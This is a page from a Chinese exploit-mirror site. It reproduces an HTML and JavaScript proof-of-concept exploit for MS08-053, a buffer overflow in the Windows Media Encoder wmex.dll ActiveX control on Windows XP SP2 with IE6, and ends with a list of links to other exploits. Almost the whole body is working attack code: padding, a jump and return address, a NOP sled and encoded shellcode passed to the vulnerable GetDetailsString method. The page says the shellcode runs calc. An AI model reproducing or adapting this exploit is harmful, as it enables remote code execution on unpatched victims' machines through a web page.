手机
当前位置:查字典教程网 >网络安全 >Exploit >Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)
Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)
摘要:======================================================================...

<html>

<pre> =============================================================================

MS08-053 Windows Media Encoder wmex.dll ActiveX Control Buffer Overflow

============================================================================= Calc execution POC Exploit for WinXP SP2 PRO English / IE6.0 SP2 Found by : Nguyen Minh Duc and Le Manh Tung

Advisory : http://www.microsoft.com/technet/security/Bulletin/MS08-053.mspx Exploit by : haluznik | haluznik<at>gmail.com 09.10.2008

============================================================================= <input language=JavaScript onclick=poc() type=button value="launch exploit"> <OBJECT id="target" classid="clsid:A8D3AD02-7508-4004-B2E9-AD33F087F43C">

</OBJECT> <script> function poc() { var shellcode = unescape(

"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4948%u4949"

"%u4949%u4949%u4949%u4949%u5a51%u436a%u3058%u3142%u4250%u6b41"

"%u4142%u4253%u4232%u3241%u4141%u4130%u5841%u3850%u4242%u4875"

"%u6b69%u4d4c%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c"

"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f%u6e68%u736b"

"%u716f%u6530%u6a51%u724b%u4e69%u366b%u4e54%u456b%u4a51%u464e"

"%u6b51%u4f70%u4c69%u6e6c%u5964%u7350%u5344%u5837%u7a41%u546a"

"%u334d%u7831%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955"

"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b%u726c%u4c6b"

"%u534b%u376f%u636c%u6a31%u4e4b%u756b%u6c4c%u544b%u4841%u4d6b"

"%u5159%u514c%u3434%u4a44%u3063%u6f31%u6230%u4e44%u716b%u5450"

"%u4b70%u6b35%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530"

"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b%u6c30%u5770"

"%u5770%u4770%u4c70%u704b%u4768%u714c%u444f%u6b71%u3346%u6650"

"%u4f36%u4c79%u6e38%u4f63%u7130%u306b%u4150%u5878%u6c70%u534a"

"%u5134%u334f%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377"

"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f%u4147%u4163"

"%u504c%u4273%u3159%u5063%u6574%u7035%u546d%u6573%u3362%u306c"

"%u4163%u7071%u536c%u6653%u314e%u7475%u7038%u7765%u4370"); var buff= "";

var nsp = unescape("%u06EB%u9090");

var sh = unescape("%u6950%u74C9");

var nop = unescape("%u9090%u9090%u9090%u9090%u9090%u9090"); for (i=0;i<1638;i ) buff=buff unescape("%u4141"); buff = buff nsp sh nop shellcode; target.GetDetailsString(buff,1);

} </script>

</pre>

</html>

【Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)】相关文章:

Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit

BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service

Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit

Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

PPMate PPMedia Class ActiveX Control Buffer Overflow PoC

HIOX Browser Statistics 2.0 Arbitrary Add Admin User Exploit

TGS CMS 0.3.2r2 Remote Code Execution Exploit

moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit

Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow Exploit (c)

fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit

精品推荐
分类导航